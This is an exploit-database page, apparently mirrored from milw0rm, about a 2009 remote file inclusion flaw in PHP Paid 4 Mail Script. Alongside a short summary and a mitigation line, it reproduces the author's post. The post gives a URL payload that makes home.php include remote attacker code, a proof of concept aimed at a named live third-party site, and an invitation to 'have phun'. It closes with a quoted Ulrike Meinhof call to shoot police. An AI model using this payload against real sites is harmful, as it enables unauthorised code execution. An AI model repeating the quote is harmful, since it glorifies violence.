header-logo
Suggest Exploit
vendor:
PHP Paid 4 Mail Script
by:
int_main();
7,5
CVSS
HIGH
File Inclusion
98
CWE
Product Name: PHP Paid 4 Mail Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP Paid 4 Mail Script File Inclusion vuln

A vulnerability in the PHP Paid 4 Mail Script allows attackers to include arbitrary files from remote locations. This is done by manipulating the 'page' parameter in the 'home.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an URL in the 'page' parameter. This can be used to include arbitrary files from remote locations, which can lead to the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files from remote locations.
Source

Exploit-DB raw data:

_______         ___________
\   _  \ ___  __\_   _____/
/  /_\  \\  \/  /|    __)  
\  \_/   \>    < |     \   
 \_____  /__/\_ \\___  /   
       \/      \/    \/    
                       #ruling the web since 9/2008


  [=] PHP Paid 4 Mail Script File Inclusion vuln
       
       Vendor   : http://www.shop-020.de
       Script   : PHP Paid 4 Mail Script 
       Download : http://www.shop-020.de/phpscriptat-p25h4s5-PHP-Paid-4-Mail-Scri.html
       Author   : int_main();
       Contact  : someone[at]jabber.ccc.de
       Site     : 0xFEE1DEAD.de
       Greez    : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs
      


       Exploit:

       http://[target]/home.php?page=[evilscript]

       POC:

       http://www.city-demo.at/mail/home.php?page=http://google.de

       (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.)

       Have phun, wui!

  [=]     
       "Wir sagen natürlich, die Bullen sind Schweine, wir sagen, der Typ in Uniform ist ein Schwein, das ist kein Mensch, (...) 
       und natürlich kann geschossen werden!" (Ulrike Meinhof, 1970)" 
  [=] 

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR